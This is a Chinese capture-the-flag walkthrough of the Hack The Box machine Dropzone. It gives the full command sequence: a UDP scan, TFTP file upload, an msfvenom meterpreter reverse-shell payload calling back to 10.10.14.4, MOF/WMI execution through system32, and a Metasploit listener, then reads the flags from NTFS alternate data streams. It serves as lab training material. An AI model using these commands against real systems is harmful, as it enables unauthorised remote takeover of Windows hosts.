导语:今天我们的靶机是Dropzone,同样来自hack the box。hack the box实验室有很多靶机,难度从初级到专业级都有,本次我们的靶机属于专业级。任务是查看user.txt和root.txt文件内容。

今天我们的靶机是Dropzone,同样来自hack the box。hack the box实验室有很多靶机,难度从初级到专业级都有,本次我们的靶机属于专业级。任务是查看user.txt和root.txt文件内容。

靶机Dropzone的IP地址是10.10.10.90.

下面就正式开始对靶机进行渗透。

首先用nmap来扫一下开放的端口和服务,这里使用的参数是-sU,如下所示:

nmap -sU -T4 10.10.10.90

扫描结果如图:

1.png

从图中可以看出,靶机开放了69端口,并且运行着TFTP服务。

我们使用tftp客户端连接到目标系统中,意外的发现我们竟然可以上传和下载文件。我们试着下载“boot.ini”文件到本地,然后退出tftp连接,在本地使用cat命令查看一下这个文件,发现目标系统运行的是Windows XP系统,如图所示:

2.png

不过我们没有找到对tftp服务进行利用的exp,所以我们打算使用MOF文件WMI利用来获取目标系统的反弹shell。

首先我们使用msfvenom生成一个可执行的木马文件,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.4 lport=443 -f exe > hack.exe

如图:

3.png

msf中还有一个模块叫“wbemexec.rb”,这个模块可以生成MOF文件(你可以在这里找到该文件),我们下载该文件,并对它进行编辑来运行我们自己的shell代码。修改后的代码,你可以从这里下载,如图所示:

4.png

接着我们使用tftp连接上去,然后上传hack.exe和MOF文件,命令如下:

tftp> binary
tftp> put hack.exe /WINDOWS/system32/hack.exe
tftp> put hack.mof /WINDOWS/system32/wbem/mof/hack.mof

如图:

5.png

在上传文件之前,我们先在本地设置一下监听,命令如下:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.4
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run

只要我们上传了MOF文件和payload,并得以执行,我们就可以获得一个反向shell。获得反向shell后,我们来查看一下系统信息,意外的发现,这个shell竟然就是一个administrator账户,查看信息命令:

meterpreter > sysinfo
meterpreter > getuid

结果如图:

6.png

我们进入到桌面,发现了root.txt文件,不过查看文件内容后,发现flag并不在该文件中,命令如下:

meterpreter > cd Administrator
meterpreter > ls
meterpreter > cd Desktop
meterpreter > ls
meterpreter > cat root.txt

如图:

7.png

可以看到桌面上还有另外一个目录flags,我们进入到该目录,发现了一个奇怪的文件,文件名是2 for the price of 1!.txt,这个文件给了我们一个提示,就是我们必须使用交换数据流来获取flag,交换数据流是NTFS文件系统的一个属性,这个属性可以用来隐藏数据。

meterpreter > cd flags
meterpreter > dir
meterpreter > cat "2 for the price of 1!.txt"

我们可以使用sysinternals工具集中的streams.exe文件来检查交换数据流(工具下载地址在这里)

接着,我们将streams.exe上传到目标系统中,然后生成一个shell,然后执行这个可执行文件来查找当前目录中的交换数据流,如此一来,我们就找到了user flag和root flag,命令如下:

meterpreter > upload /root/Downloads/Streams/streams.exe
meterpreter > shell
streams -accepteula -s .

结果如图:

8.png

本次靶机到此结束,谢谢大家!

源链接

Hacking more

...